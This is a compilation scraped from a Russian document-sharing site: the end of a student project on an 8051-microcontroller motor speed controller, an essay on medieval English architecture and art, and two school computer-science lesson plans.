Режим "1" - асинхронный обмен, десятибитовый кадр, состоящий из стартового (ноль), стопового (единица) битов и 8-разрядного символа. Cкорость приема и передачи определяется частотой переполнения счетчика С/ T1. В зависимости от состояния бита SMOD регистра PCON частота, поступающая на вход схемы синхронизации последовательного канала с выхода С/Т1, может изменяться в два раза. Схема синхронизации делит эту частоту на 16 и использует её для приема/передачи последовательного кода. При использовании этого режима следует запретить прерывание от С/Т1. При приеме стоп-бит заносится в бит RB8 регистра SCON.
Режим "2" - асинхронный 11-битовый кадр. По сравнению с режимом 1 добавлен программно устанавливаемый девятый бит. Передаваемый девятый бит данных принимает значение бита TB8 из регистра управления SCON. Этот бит может быть программно установлен в 0 или 1. В частности, ТВ8 можно присвоить значение бита паритета Р из регистра PSW для повышения достоверности передаваемой информации. При приеме девятый бит данных поступает в бит RB8 регистра SCON. Cкорость передачи фиксирована и определяется значением бита SMOD регистра PCON: OSC/32 или OSC/64.
Режим "3" - аналогичен режиму "2", но скорость обмена задается счетчиком С/T1, как в режиме "1".
Основная настройка последовательного канала на требуемый режим работы производится в регистре SCON, в котором задается режим работы, значение 11-го бита, разрешение контроля 11-го бита (в режимах '2' и '3'), флаги готовности приемника и передатчика. Формат регистра управления/статуса универсального асинхронного приемопередатчика (УАПП) SCON имеет вид:
SM0,SM1 - биты управления режимом, устанавливаются/сбрасываются программно: SM0, SM1 = 00 - режим '0', SM0, SM1 = 01 - режим '1', SM0, SM1 = 10 - режим '2', SM0, SM1 = 11 - режим '3', SM2 - запрещение приема кадров с нулевым восьмым битом, в режиме '0' должен быть сброшен, устанавливается программно; RЕN - разрешения приема, устанавливается/сбрасывается программно; TB8 - восьмой бит передатчика в режимах '2' и '3'; RB8 - восьмой бит приемника в режимах '2' и '3', в режиме '1', если SM2=0, то отображает стоповый бит, в режиме '0' не используется; TI - флаг готовности передатчика, устанавливается аппаратно по окончании передачи байта, сбрасывается программно; RI - флаг готовности приемника, принцип работы аналогичен TI.
Скорость последовательного обмена в зависимости от режима работы определяется либо частотой работы ОМК ( режимы 0 и 2) либо частотой переполнения C/T1 (режимы 1 и 3).
В режимах 1-3 изменение частоты передачи информации в 2 раза обеспечивается битом SMOD регистра PCON.
В режиме '2' скорость задается частотой f=(osc/64)*2smod.
В режимах '1' и '3' - частотой f=(2smod)*fC/T1, fC/T1 - частота переполнения С/T1.
Формат регистра управления мощностью PCON:
SMOD - бит управления скоростью передачи УАПП, при SMOD = 1 скорость передачи вдвое больше, чем при SMOD = 0; GF1, GF2 - флаги общего назначения, устанавливаемые пользователем; PD - установка бита переводит ОМК в режим холостого хода.
Hаиболее удобен для использования в последовательном канале режим '2' счетчика/таймера С/Т1, если с его помощью можно обеспечить требуемую скорость передачи, так как в этом режиме не требуется перезагрузка коэффициента пересчета.
Для использования C/T1 в качестве источника скорости обмена необходимо:
запретить прерывание от C/T1;
запрограммировать работу C/T1;
запустить C/T1.
Особые режимы работы.
Сброс.
Сброс осуществляется подачей лог.1 на вход RST и должен удерживаться в этом состоянии не менее 24/OSC. Под действием сброса обнуляются регистры PC, FC, PSW, DPTR, TMOD, TCON, T/C0, T/C1, IE, IP, SCON, в регистре PCON сбрасываеся только только старший бит, в регистр SP загружается код 07h, а порты P0-P3 - коды FFH. Состояние регистра SBUF неопределенное. Сигнал сброс не воздействует на содержимое РПД. Когда включается питание, состояние РПД неопределннное, за исключением операции возврата из режима пониженного энергопотребления.
Режим холостого хода.
ОМК работает в этом режиме, если бит PCON.0 установлен. При этом продолжает работать внутренний генератор, но блокируются функциональные узлы ЦП, что уменьшает энергопотребление на 15 – 30 %. Все регистры и РПД сохраняют свои значения, а на выводах ALE и PSEN формируется уровень единицы. Выйти из этого режима можно по сбросу или по прерыванию. По любому из этих действий бит PCON.0 сбрасывается и продолжится работа ОМК с той команды, перед которой был установлен режим холостого хода.
Режим пониженного энергопотребления.
Переход в этот режим возможен, если установить бит PCON.1. В этом режиме внутренний генератор прекращает работу и сохраняется только содержимое РПД. Поэтому необходимые регистры спецфункций предварительно следует сохранять в РПД. Резервное питание должно поступать через вывод RST/VPD. Напряжение основного источника питания может быть уменьшено до 2 В. Перед выходом из режима оно должно быть восстановлено до номинального значения. Энергопотребление снижается более значительно, чем в режиме холостого хода. В ОМК 1830ВЕ51 при номинальном токе потребления 18 мА это значение снижается в режиме холостого хода до 4,2 мА, а в режиме пониженного энергопотребления – до 50 мкА. Выход из режима возможен только по сигналу сброса, который должен удерживаться в активном состоянии не менее 10 мс (время восстановления работы задающего генератора). При одновременной записи PCON.0 и PCON.1 преимущество имеет PCON.1. Режимы холостого хода и пониженного энергоптребления поддерживаются не всеми ОМК и эту ситуацию необходимо контролировать.
Защита от падения напряжения.
При немгновенных отказах электропитания ОМК можно обеспечить сохранность содержимого РПД с помощью батарейного питания, присоединенного к выводам RST/VPD. Для этого ОМК, получив сообщение о грозящем отключении, должен перезагрузить необходимые параметры в РПД и перейти в режим пониженного энергопотребления. После восстановления номинального напряжения выполняется системный сброс и источник аварийного питания может быть отключен.
Режим загрузки и верификации программ.
Под воздействием внешних электрических сигналов в ОМК может быть записано требуемое программное обеспечение. Для ПЗУ с ультрафиолетовым стиранием (УФ) информации его необходимо предварительно очистить, поместив ОМК под источник УФ с длиной волны менее 4х10-7 м. Программирование осуществляется на частоте внутреннего генератора 4 –6 МГц. Адрес, по которому осуществляется программирование, задается через порт 1 и выводы Р2.0 – Р2.3, а данные должны быть поданы на вход порта Р0. В процедуре программирования задействованы и другие выводы ОМК. В процессе программирования необходимо формировать определенную временную диаграмму и иметь дополнительный источник импульсных сигналов амплитудой 21+/-0,5 В. В процессе программирования можно установить бит защиты, который запрещает доступ к резидентной памяти программ любыми внешними средствами. Бит защиты можно сбросить только путем полного стирания содержимого памяти под источником УФ. Если бит защиты не установлен, то содержимое резидентной памяти можно прочитать с помощью процедуры аналогичной процедуре программирования.
3.3 Выбор датчика скорости
Для измерения частоты вращения двигателя используем тахогенератор ТМГ-30П («Микротех») с номинальной частотой вращения 4000 об/мин. Выбор данного устройства обусловлен его высокой надежностью, работоспособностью в жестких условиях эксплуатации. Схема устройства приведена на рис. 11.
3.4 Выбор датчика температуры
В процессе эксплуатации двигателя необходимо контролировать температуру корпуса, чтобы фиксировать перегревание корпуса.
Для контроля температуры выберем датчик ТСМ МЕТРАН-243 фирмы «Метран», работающий в диапазоне -50…+120оС, содержащий один чувствительный элемент и предназначенный для измерения температуры поверхности твердых тел. Схема датчика ТСМ МЕТРАН-243 с удлинительными проводами приведена на рис. 12.
Выбор АЦП
В качестве аналого-цифрового преобразователя будем использовать 8-разрядный АЦП типа К1107ПВ4 («Симметрон»). Микросхема данного типа предназначена для преобразования входного сигнала в параллельный двоичный прямой код. Содержит 6000 интегральных элементов. Масса не более 22 г. Структурная схема АЦП и описание выводов приведены, соответственно, на рис. 13 и в табл. 1.
Предельно допустимые режимы эксплуатации микросхемы допускают: UП1=4.75…5.25 В; UП2= –5.46…–4.94 В; Uвх= –2. 6…2.6 В.
Выбор ЦАП
Выберем в качестве ЦАП микросхему К572ПА1, которая находит широкое применение в различной аппаратуре благодаря малой потребляемой мощности, высокому быстродействию и небольшим габаритам. Микросхема используется для преобразования прямого параллельного двоичного кода на цифровых входах в ток на аналоговом выходе, который пропорционален значениям кода и опорного напряжения. На рис. 14 числами обозначены: 1 – аналоговый вход 1; 2 – аналоговый вход 2; 5-12 – цифровые входы 2-9; 13, 14 – напряжение источника питания; 15 – опорное напряжение; 16 – вывод резистора обратной связи. Число разрядов К572ПА1 – 8.
Выбор остальных элементов системы
Будем также использовать операционные усилители типа 553УД2, тиристоры КУ101А отечественного производства, руководствуясь невысокой стоимостью указанных элементов и возможностью применения в условиях поставленной в курсовом проекте задачи. Выбранные составные части элементной базы обладают достаточной производительностью для выполнения требуемых функций.
4 Разработка функциональной схемы
Система управления скоростью вращения асинхронного двигателя построена на базе микроконтроллера КР1816ВЕ51. Функциональная схема системы приведена на рис. 15.
5 Разработка алгоритма работы и программы
Реализация алгоритма работы (рис. 16) предполагает уменьшение скорости вращения двигателя до заданного значения в случае его перегрева и отклонения от заданного значения скорости. Параметры, снимаемые с датчиков, поступают в АЦП, преобразуются в двоичный код и сравниваются с заданными значениями. Если значения не попадают в заданный интервал, выполняется подпрограмма корректировки скорости вращения с целью перехода в нормальный режим работы.
Для реализации выбранного алгоритма регулирования с помощью микроконтроллера была составлена программа на языке Ассемблер. Подобная программа может быть написана в среде ProView фирмы Franklin Software Inc, предназначенной для разработки программного обеспечения для однокристальных микроконтроллеров семейства Intel 8051. Текст программы приведен в Приложении.
ЗАКЛЮЧЕНИЕ
В данном курсовом проекте была разработана система регулирования скорости вращения асинхронного двигателя на основе однокристального микроконтроллера 51-го семейства. Была разработана структурная схема, где в качестве отдельных блоков были выделены блок управления, асинхронный двигатель, датчик температуры, датчик скорости, а также регулятор скорости. В качестве объекта управления был выбран трехфазный асинхронный двигатель общепромышленного назначения. В качестве метода управления был выбран способ тиристорного регулирования скорости вращения двигателя (управления с помощью тиристорной пары) как наиболее простой и наименее дорогостоящий из применяющихся в подобных системах способов регулирования. В ходе выбора датчиков, АЦП, ЦАП, в основном, ставка делалась на недорогую отечественную продукцию, поскольку реализация любого проекта всегда требует серьезных материальных затрат. При этом выбранная элементная база удовлетворяет техническим концепциям построения системы. Была построена функциональная схема и блок-схема алгоритма функционирования, отображающие принцип работы всей системы в целом. Была написана программа реализации алгоритма на языке Ассемблер.
В настоящее время существуют множество разработок, посвященных решению поставленной в данном проекте задачи. Однако существующие жесткие стандарты требуют следования современным тенденциям, поэтому необходимы наиболее простые и эффективные пути решения при небольших материальных затратах. Спроектированная система представляет одно из многих конструктивных решений, выбранное в силу причин, описанных выше. |
https://doc4web.ru/istoriya/arhitektura-srednevekovya.html | Архитектура Средневековья | https://doc4web.ru/uploads/files/199/d1ed8d21137ed40a953a53eff4e227b0.docx | files/d1ed8d21137ed40a953a53eff4e227b0.docx | 5
I. Архитектура средневековой Англии
Развитие собственно английской архитектуры можно проследить с VII века. Англосаксы, сложившиеся в VII-IX века в народность, строили из дерева простые каркасные постройки. Жилищем в древностях служили примитивные хижины. Там, где хозяйство велось, целым родом, строился холл (hall) – большое продолговатое в плане помещение под высокой двускатной крышей, где собирались работавшие в хозяйстве. Посреди холла устраивали на земле открытый очаг, а для улавливания и отвода дыма сооружался «дымник» - козырек под кровлей. С христианизацией англосаксов началось строительство церквей силами мастеров с континента. Сложные из кирпича разрушенных римских построек первые церкви несут печать итало-галльских и восточно-христианских влияний. Образцы их сохранились в Брэдуэлле (Bradwell, Эссекс, около 654-660 гг.), Бриксуорте (Brixworth, Нортхемптоншир, около 670- 675 гг.), Бредфорд-он-Эйвон (Bredford on Avon, Уилтшир, около 675-709 гг. и начало X в.). Это – скромные сооружения с двухскатной кровлей на деревянных стропилах, к восточному торцу пристраивалось небольшое прямоугольное помещение с алтарной апсидой. В церквах периода датского владычества (IX- нач. XI вв.) акцентировался западный фасад, возводились западные трансепты и башни. Эти приемы вошли в традицию, возродившуюся в готический период. О связи каменной архитектуры с народным деревянным зодчеством свидетельствует деревянным зодчеством свидетельствует деревянная башнеобразная церковь в Гринстеде (Greenstead, Эссекс, около 1000 г.) с каркасной конструкцией. Со временем такой каркас начали заполнять камнем, и когда стены стали достаточно прочными, чтобы нести башню, от каркаса отказались. В Бартоне-он-Хамбер (Barton on Humber, Линкольншир, конец X в.) и Эрлс-Бартоне (Earl’s Barton, Нортхемптоншир, около 980 – 1000 гг.) сохранились каменные прямоугольные в плане церковные башни, наружный декор которых указывает на происхождение их от деревянных каркасных построек. В этих постройках предвосхищались формы башен, типичные для английской средневековой архитектуры.
Романский стиль. Развитие романской архитектуры Великобритании (XI –XII вв.) связано с вторжением в Англию в 1066 норманнов, положивших начало централизованному феодальному государству. Вильгельм Завоеватель начал обширное строительство замков и крупных церквей, чтобы утвердиться в покоренной стране. Первыми норманнскими укреплениями в Великобритании были рвы и палисады вокруг «бейли» - гарнизонных стоянок лучников. К ним примыкал насыпной холм с донжоном – укрепленным жилищем королевского вассала или его наместника. Деревянные донжоны постепенно сменялись каменными – кубическими по форме, а затем и башнеобразными. К концу XII века по стране было разбросано около 80 замков. Важнейшим был Тауэр – замок Вильгельма в Лондоне, остатки норманнских замков сохранились в Дувре, Ноттингеме, Норидже, Ньюкасле, Рочестре, Коллчестре (Colchester, Эссекс, около 1080 – XII в.), Конисбро (Conisbrough, Йоркшир, около 1180 -1190г.), Ричмонде (Richmond, Йоркшир, 1072 – 1146, донжон около 1171 – 1180г.). Однако в стране, защищенной морем, в условиях политической централизации фортификационная архитектура развивалась медленно.
Города в земледельческой Англии были до второй половины XII века развиты слабее, чем на континенте. Как правило, они вырастали вокруг бывших римских поселений: в основу их планировки легла регулярная сетка римских лагерей, небольшая территория которых со временем окружалась беспорядочной и скученной средневековой застройкой. От римлян была унаследована схема пересекающихся под прямым углом осевых артерий, но центры не акцентировались; ратуши были исключением, а соборы нередко располагались в стороне от центра.
Со второй половины XII века складывалась устойчивая композиция раннеанглийского усадебного дома – деревянного, фахверкового, реже каменного, со складом внизу и жильём на втором этаже, куда вела наружная каменная или деревянная лестница. С XIII века со стороны лестницы пристраивали деревянный холл.
В XI – XII веках норманны повсеместно строили крупные соборы и монастыри (их насчитывается 95), причем грань между теми и другими стерлась: монастырские церкви обслуживали также и мирян, а соборы – монахов. Хотя эти храмы (трёхнефные базилики) строились по образцам нормандской школы, пропорции плана изменились: монастыри – соборы Англии имели чрезвычайно длинные, узкие неф и хор (длина собора в Уинчестере свыше 170 м.), протяженность которых к началу готического периода стала примерно ровной; сильно выступающий трансепт оказывался в центре собора. В пасмурной Англии ярус верхних окон был обязательным, поэтому цилиндрические своды не возводились и перекрытия чаще всего были стропильными. Церкви, возведенные нормандскими мастерами с помощью сгонявшегося окрестного населения, поражают своими масштабами, мощью грузных, массивных стен. Растянутые, прямоугольные по очертаниям романские храмы Англии производят впечатление тяжеловесного и несколько мрачного величия, внутренней энергии, как бы сконцентрированной в могучей квадратной башне, которая возвышается в центре над средокрестием и связывает воедино массы собора. Плоскости стен подчеркивались в интерьерах богатым, некогда полихромным, резным геометрическим узором, который вместе с мерцавшей в сумраке позолотой придавал оттенок торжественности суровой атмосфере, господствовавшей в храме. В вытянутых узких нефах, разделенных по высоте на три яруса (аркады, трифорий, окна), сильный пространственный эффект создавала перспектива аркад, устремляющихся навстречу хору.
Несмотря на перестройки, многие соборы сохранили свой романский характер. В романской архитектуре Англии при её несомненном единообразии различаются три местные школы. На юге-востоке (Норидж, Сенат-Олбанс, Или, Питерборо) строились нефы огромной длины с примерно равной высотой в интерьере всех трех ярусов и сложными опорами. На западе (Глостер) нефы короче, высота трифориев незначительна, господствуют массивные опоры круглого сечения, широко применён геометрический узор. Северной школой, наиболее самостоятельной и творческой, были введены чередование опор и стрельчатая арка; в Дареме около 1130 -1133 центральный неф огромного собора был впервые в Европе перекрыт нервюрным крестовым сводом. Этим предвосхищался принцип готической архитектуры, но её развитие в Великобританию задержали двадцатилетние усобицы. Англия восприняла готику уже во второй половине XII века и притом из Франции.
Готика. Новая династия Плантагенетов (1154 – 1399), связанная с Францией и покровительствовавшая больше городам, чем монастырям, способствовала утверждению готики, наталкивавшейся, однако, на стойкую романскую традицию. Построенный французским мастером хор собора в Кентербери не вызвал подражаний. Даже в конце XII века строились романские соборы, притом с деревянным перекрытием (Питерборо). К тому же потребность в новых соборах была невелика, поскольку прежние были достаточно крупными. В результате готические одежды часто лишь покрывали романское ядро (хор в Глостере, собор в Уинчестере).
С начала XIII века бурно развивались овцеводство, торговля и ремесла, города восточного побережья богатели на вывозе шерсти, росло деятельное торгово-промышленное сословие, расшатывались устои религиозно-феодального мировоззрения. Строительная инициатива перешла от монастырей к горожанам. Города соревновались, перестраивая громады романских храмов в импозантные, подобные дворцам, готические соборы, в которых сосредотачивалась общественная жизнь города. Расцвело ремесленное мастерство. С конца XII века широко внедрялся местный пёрберский мрамор, легко поддающийся резцу. Его добывали на полуострове Пёрборк (Purberck, Дорсетшир). Скульптура и пышный растительный орнамент дополняли готические формы.
Английская готика примечательна не столько своими конструктивными, сколько декоративными особенностями. Она сохранила от романского периода простоту объемно-пространственных решений, вытянутость и приземистость основных масс, господство прямых линий, отчетливый ритм горизонтальных и вертикальных членений, могучие прямоугольные башни и прямоугольное завершение хора. Стена с контрфорсами осталась основной конструкции: потребность в аркбутанах возникала редко, поскольку высота сводов была сравнительно небольшой. План, легко воспринимающийся по внешнему объему, имел прежнюю форму латинского креста, хотя при перестройке хоров нередко вводится второй трансепт. Не порывая с плоскостной трактовкой стены, строители одевали ее ритмически богатым, разнообразным декором, как бы живущим самостоятельной жизнью. Лучшие западные фасады английской готики (Линкольн, Солсбери) – своеобразные декоративные экраны, не отражающие внутренней структуры собора. Они вытянуты в ширину больше, чем на континенте, подчас шире самого здания и затянуты прихотливой сеткой пластического декора. Орнаментальная фантазия английских мастеров проявилась в сложном, иногда чисто декоративном, переплетении нервюр. Поэтому закономерна периодизация английской готики по эволюции декоративных элементов (форма окон, рисунок оконных переплетов); принято выделять три основных стилистических периода в развитии английской готической архитектуры: «раннеанглийская» (от последней четверти XII века до второй половины XIII века), «украшенная», или «геометрически-криволинейная» (до второй половины XIV века) и «перпендик4улярная» (до середины XVI века) готика.
В первый период господствуют ланцетовидные очертания арок и проемов. За счет яруса трифориев вытягиваются в высоту аркада и верхние окна, что улучшает освещение нефа. Постепенно услохняются неврюрные своды, а также формы опор (четыре свободных ствола, окружающих столб, в хоре собора в Линкольне). Скульптура вытесняет геометрический орнамент. Лучший образец – собор в Солсбери.
Во второй период исчезает заостренность форм, окна становятся больше и шире, подчас заполняя собой фасад. В усложненных переплетах преобладает геометрический рисунок, вместе с тем появляется пристрастие к изогнутым линиям, криволинейному «пламенеющему» декору, проникшему во второй половине XIV века во Францию. Воздвигаются более стройные, устремленные ввысь башни (в Уэллсе, Солсбери). В интерьерах трифорий теряет первичное значение, опоры обрастают пучками мраморных стволов. Яркий декоративный эффект создает сочетание арок с опрокинутыми «контр-арками» в средокрестии собора в Уэллсе. В декоре роскошный растительный орнамент приближается к местной природе. Лучшие образцы – собор в Эксетере, западный фасад собора в Йорке, зал капитула при Вестминстерском аббатстве в Лондоне, «капелла богоматери» в Или.
Эпидемия чумы – «черная смерть» (1348-1349) – истребила большинство искусных городских мастеров, что ускорило конец «украшенной готики» - золотого века для мастеров обработки камня. Городских каменщиков сменили сельские мастера: это способствовало упрощению основных очертаний построек и оживлению народных традиций (передача в камне деревянных конструкций каркаса и панели, замысловатый резной декор). Эти изменения отвечали новым общественным условиям. Развитие буржуазных отношений, формирование абсолютистского государства и консолидации нации побуждали к выработке специфически национального стиля. В архитектуре усиливались светские начала. Церковное строительство быстро теряло свою ведущую роль. Развитие общественной жизни требовало новых архитектурных типов и пространственных решений. В церковном зодчестве «перпендикулярный стиль» характерен главным образом для небольших сооружений – капелл, гробниц, балдахинов. Зато он расцвел в университетских зданиях Оксфорда и Кембриджа, где «перпендикулярные» формы удержались до середины XVII века. Торгово-промышленные корпорации пристраивали к церквам роскошные цеховые капеллы, возводили богато отделанные гильдейские дома и «банкетные залы». Характерные для этого периода полные света зальные помещения с большими окнами. Свободному ощущению пространства способствовали частичная замена массивных опор консолями и рождение уплощенной «арки Тюдоров». Особенно показателен декор из бесконечного ряда бегущих ввысь «перпендикуляров» и сложнейшего ювелирного плетения нервюр веерообразных, сетчатых, сотовых, звездчатых и иных сводов. Теряя конструктивную ясность, своды нередко превращались в декоративные потолки, вырезанные из дерева или напоминающий хор собора в Глостере, высокий зал с огромными окнами, своеобразный каменный фонарь. Затем последовали перестройки собора в Кентербери, хора в Йорке, сводов собора в Оксфорде, сооружение великолепных капелл (капелла Генриха VII в Вестминстерском аббатстве), университетских и цеховых построек.
Фортификационная архитектура была мало оригинальна и, если не считать королевских замков (крупнейший – в Виндзоре), сводилась к укреплениям на шотландской границе и юго-восточном побережье. В условиях централизующего режима феодальные замки превращались в загородные резиденции знати, а к концу XV века строительство замков прекратилось.
II. Изобразительное искусство средневековой Англии
Английское искусство раннего средневековья недостаточно известно. Многие его памятники уничтожены в результате иконоборчества, связанного с церковными реформами Генриха VIII в XVI веке, и победы пуритан в середине XVII века; многое погибло от времени и неумелых реставраций, а сохранилось не всегда лучшее. Об искусстве до норманнского завоевания можно судить главным образом по книжной миниатюре. Её богатейший декоративно-орнаментальный стиль (с поразительным по сложности и причудливости переплетением лент, завитков, петель и стилизованных фигур животных) сложился при взаимодействии ирландско-кельтской культуры и искусства англосаксонских королевств (прежде всего Нортумбрии) и пережил первый расцвет в VII веке. Блестящий образец этого стиля – миниатюры «Линдсфарнского евангелия» (Нортумбрия, около 698-721 гг.), непревзойденные по богатству орнаментальной фантазии и тонкости выполнения. Сходные резных крестах и стелах, встречающихся как на севере, так и на юге Англии.
Во второй половине X века одним из главных художественных центров стало Уинчестерское аббатство. В миниатюрах уинчестерской школы изобразительно-иллюстративные мотивы играли уже не меньшую роль, чем орнамент. В начале XII века английская миниатюра с её энергичным ритмом криволинейного узора, богатой красочностью или легким, живым штрихом занимала первое место среди европейских школ. К этому же времени относятся и первые дошедшие до нас стенные росписи (в соборе Кентербери и др.), близкие к миниатюрам того времени по иконографическим мотивам и по своему линейно графическому стилю. В XIII веке были исполнены циклы росписей в Вестминстерстве, соборах Сент-Олбанса и Уинчестера. Шедевр английской готической живописи – тондо в капелле епископского дворца в Чичестере, изображающее мадонну с младенцем (около 1260). Оно отличается необыкновенной тонкостью контурного рисунка и нежной красочной гаммой, выдержанной в розоватых, голубых и золотых тонах.
Скульптура в средневековой Англии была широко распространена, особенно с XIII века. При её плоскостном характере, недостатке пластического обобщения, психологической и драматической выразительности она обладала стройностью ритма, декоративной узорностью отделки. Вместе с тем в ней очень рано сказалась тонкая реалистическая наблюдательность английских мастеров. Главные фасады многих готических соборов Англии сплошь одеты рядами скульптурных фризов, где остальные статуи теряются в общей орнаментальной композиции. Но в скульптурном декоре церквей нередко встречаются яркие фольклорные сценки, фигуры, привлекающие живым изяществом. Широкое распространение получили в Англии фигурные надгробья из дерева, пёрбекского мрамора, бронзы и чаще всего из алебастра, а также гравированные изображения на листах меди, наложенных на надгробные плиты. В этих портретных фигурах, подчас несколько однообразных и застылых, можно видеть первые яркие проявления столь характерного для Англии реалистического портрета.
В XIII –XIV веках английская книжная миниатюра становилась все более изысканной и утонченной по стилю, почти неотличимой от французской. Монументальная живопись сохранила большую самобытность. В ней отразились и антифеодальные народные движения второй половины X IV века. В сельских церквах появились изображения Христа в виде простого пахаря, навеянные популярной тогда религиозной поэмой У. Ленгленда «Видение о Петре Пахаре» (1362). Страдания Христа в этих росписях показываются как страдания простого народа, истязаемого и угнетенного. Одновременно с новым демократическим содержанием, отрывающимся от канонических традиций, здесь явно выступают и новые реалистические тенденции. Они ощутимы и в складывающейся в это время станковой живописи. Декоративной красотой, редким мастерством исполнения, тонко наблюдёнными жизненными деталями выделяется, тем не менее, Уилтонский складень (около 1389), относимый к франко-аглийской школе. На правой его створке изображена мадонна с младенцем, стоящая в окружении ангелов, на левой – коленопреклоненный король Ричард II среди святых. Ранний образец английской портретной живописи – большой портрет Ричарда II в Вестминстерском аббатстве (1390-е гг.), по своим размерам и индивидуальности образца не имеет аналогий в европейском искусстве того времени. В XV веке в Англию проникло сильное влияние реалистического нидерландского искусства, сказавшееся как в портрете, так и в стенных росписях вроде цикла «Чудес богоматери», выполненного в 1479-1488 гг. У. Бейкером (W.Baker) в капелле Итонского колледжа. Однако исторические события XV - XVI веков воспрепятствовали естественному развитию национального стиля Возрождения в английском изобразительном искусстве. |
https://doc4web.ru/informatika/urok-informatiki-dlya-klassa-predstavlenie-informacii.html | Урок информатики для 3 класса "Представление информации" | https://doc4web.ru/uploads/files/30/f10ec6bf9472d14b42d65d8f24d98cc5.docx | files/f10ec6bf9472d14b42d65d8f24d98cc5.docx | Технологическая карта урока. Матвеева. Информатика . 3 класс. ФГОС.
Урок 8. Представление информации.
Цели урока:
- формирование информационной культуры;
-изучить понятие: представление информации;
- актуализация сведений из личного опыта;
- формирование элементарных навыков исследовательской деятельности;
- умение работать в группах и индивидуально.
Этапы урока
Материал ведения урока
Деятельность учащихся
УУД на этапах урока
1
Организационный момент
Дети рассаживаются по местам. Проверяют наличие принадлежностей.
Личностные УУД:
- формирование навыков самоорганизации
- формирование навыков письма
2
Запись домашнего задания.
П. 6. Т№1. с. 28- 32 № 3,4,5,7
Работа с дневниками
3
Проверка домашнего задания
П. 5. Т№1. с. 24 - 26 № 2,3
Дети читают, рассказывают, как сделали.
Коммуникативные УУД:
- умение слушать и понимать других, исправлять ошибки
4
Повторение пройденного.
- Рассмотри рисунки. Расскажи, что такое наблюдение?
- Приведи примеры из жизни, когда ты наблюдал, что нового узнал?
- Для чего люди используют термометр?
- Что тебе известно про телескоп и микроскоп?
Читают вопросы, отвечают на них, приводят примеры.
Личностные УУД:
- формирование понятийного аппарата на основе примеров из личного опыта
5
Формулирование целей и задач урока исследовательскую деятельность.
Объяснение новой темы.
- Рассмотри обложку книги. В каких формах художник попытался передать информацию о ее содержании?
- Текс, изображение и число – это формы представления информации. Прозвучало словосочетание «представление информации». Значит:
- Ознакомься в учебнике на с. 68 с целями урока;
Прочитай фрагмент текста из повести Гераскиной Людмилы «В стране невыученных уроков». Рассмотри рисунок. Какая форма представления обладает большей наглядностью и почему?
- какую информацию можно представить текстом и нельзя представить рисунком?
-Сравни представление информации текстом, рисунком и схемой. Какая форма представления является упрощенной?
- Составь математическое выражение и реши задачу. Какую форму представления ты выберешь?
- Подумай, с какой целью представленную информацию записывают на носитель?
- текстовой, графической, числовой;
- тема урока «Представление информации»;
- читают, ставят цели;
- графическая форма дает больше наглядности, так как мы видим, что там происходит;
- текстом можно представить имена, а рисунком нельзя;
- схема, на ней не видно волос, их цвета;
- решают задачу, форма числовая. Математическое выражение – это тоже форма представления информации.
- чтобы сохранить
Регулятивные УУД:
- умение ставить учебную задачу
6
Обобщение к уроку
Прочитай в учебнике о самом главном на с. 73. Расскажи, что ты уже знал и что узнал нового?
- Читают учебник, рассказывают своими словами
Познавательные УУД:
- развитие речи,
- умение кратко формулировать мысль
- умение обрабатывать информацию
- развитие навыков исследования, закрепление навыков самостоятельной работы с учебником,
Формирование понятия «Главное».
7
Физ. минута
8
Закрепление
Работа в рабочей тетради
Т№1. с. 28-31 № 1,2,6,8
9
Компьютерный практикум
Выполнение практического задания на распечатке, работа с таблицей
Учатся создавать таблицу и работать с ней.
Регулятивные УУД:
- формирование навыков работы с ПК
Коммуникативные УУД:
- умение работать в группах
10
Итоги урока, рефлексия
Можете ли вы назвать тему урока?
- Вам было легко или были трудности?
- Что у вас получилось лучше всего и без ошибок?
- Какое задание было самым интересным и почему?
- Как бы вы оценили свою работу?
Работа с дневниками
Личностные УУД:
- развитие самооценки |
https://doc4web.ru/informatika/urok-informatiki-dlya-klassa-preobrazovanie-informacii-putem-ras.html | Урок информатики для 5 класса "Преобразование информации путем рассуждений" | https://doc4web.ru/uploads/files/34/f3f3184bf06229cfb9147b9eab9cbbdf.docx | files/f3f3184bf06229cfb9147b9eab9cbbdf.docx | Технологическая карта урока. Босова Л.Л. Информатика . 5 класс. ФГОС.
Урок 27. Преобразование информации путем рассуждений.
Планируемые учебные результаты:
предметные – формирование представлений об обработке информации путѐм логических рассуждений;
метапредметные – умение анализировать и делать выводы;
личностные – понимание роли информационных процессов в современном мире.
Решаемые учебные задачи:
1) расширить представления учащихся о задачах, связанных с обработкой информации;
2) дать представление о преобразовании информации путем рассуждений как еще одним из способов обработки информации, ведущих к получению нового содержания, новой информации.
Этапы урока
Материал ведения урока
Деятельность учащихся
УУД на этапах урока
1
Организационный момент
Дети рассаживаются по местам. Проверяют наличие принадлежностей.
Личностные УУД:
- формирование навыков самоорганизации
- формирование навыков письма
2
Запись домашнего задания.
§ 12 (6)
1)Учебник: с 96 №16
( выполнить в РТ на с. 143)
2) РТ: №178
Работа с дневниками
3
Проверка домашней работы на уроке не проводится.
§ 12 (5) РТ: №165, №166
Личностные УУД:
- развитие грамотной речи, памяти
4
Повторение пройденного( за верный ответ – 1 балл)
1)- Что такое обработка информации?
2) Что вы понимаете под систематизацией?
3)Приведите примеры информации, отсортированной: по алфавиту, в порядке убывания, в хронологической последовательности
4) Назовите методы поиска информации
5) Назовите правила преобразования информации
- читают, отвечают на вопросы;
- список учеников в журнале, высота деревьев, даты исторических событий;
- наблюдение, общение, чтение, просмотр телепередач, поиск и Интернете;
- 1)формула, 2) порядок действий
5
Формулирование темы и целей урока через повторение( за верный ответ – 1 балл)
- преобразуйте информацию устно:
- каким способом преобразована информация?
- Как рассуждения помогают преобразовывать информацию?
- Мы начали урок с логических рассуждений, которые помогли преобразовать информацию. Какова же тема нашего урока?
Назовите цели урока:
- Решают задачу о деревьях;
- путем рассуждений;
- изменяют ее, выходную преобразовывают в выходную;
- «Преобразование информации путем логических рассуждений»
Узнать: как происходит преобразование информации путем рассуждений;
Понять: для решения каких задач подходит метод рассуждений;
Научиться: решать логические задачи.
Регулятивные:
- развитие умения формулировать тему и цель урока в соответствии с задачами и нормами русского языка
Личностные:
- развитие логического мышления, познавательной активности
5
Объяснение темы +самостоятельная работа в рабочих тетрадях + работа в парах + самопроверка ( 3 балла – если нет ошибок, 2 балла – если 1 ошибка, 1 балл – если 2 ошибки, 0 баллов – если 3 и более ошибки)
-1) выполни задание в рабочей тетради
-2) выполни задание в парах
-3) проверь себя
4) оцени свою работу по баллам
- РТ. с. 129 177
- по распечатке;
- сверяют с ответами, данными в презентации
Познавательные УУД:
- формирование представлений о преобразовании информации путем логических рассуждений
Личностные:
